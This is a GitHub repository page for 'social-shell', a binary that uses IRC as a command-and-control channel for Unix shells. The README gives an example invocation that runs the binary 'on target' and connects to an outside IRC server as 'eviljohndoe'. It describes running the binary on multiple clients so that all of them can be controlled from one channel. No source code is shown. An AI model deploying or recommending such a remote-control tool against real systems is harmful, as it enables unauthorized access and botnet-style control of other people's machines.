Skip to content

aalekh-ul/social-shell

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

8 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

social-shell

A binary to chat with your unix shells on IRC, a binary to utilize IRC software as C2.
Orignally made by Aalekh Motani.

Usage:
To get the help menu: ./ircshell -h .

All options: ./ircshell -s [IRC server ip or domain] -c [channel to join] -u [username to join with] -a [username you have to join with ircclients, user who is waiting for output].

Example: ./ircshell -s irc.fakeserver.chat -c fakechannel -u johndoe -a eviljohndoe .

Here I am using my own IRC server

Step1: Join a channel on IRC client. The username you provide here is the username you have to pass to -a switch and channel to -c switch.
image
image


Step2: Run the binary on target.
image


Step3: Run the unix command you like from the chat. image
image


Run the binary on different clients and get them all at one channel to Command and Control them.

License GPLv3+: GNU GPL version 3 or later https://gnu.org/licenses/gpl.html

This is free software: you are free to change and redistribute it.

About

A binary to chat with your Unix shells on IRC

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages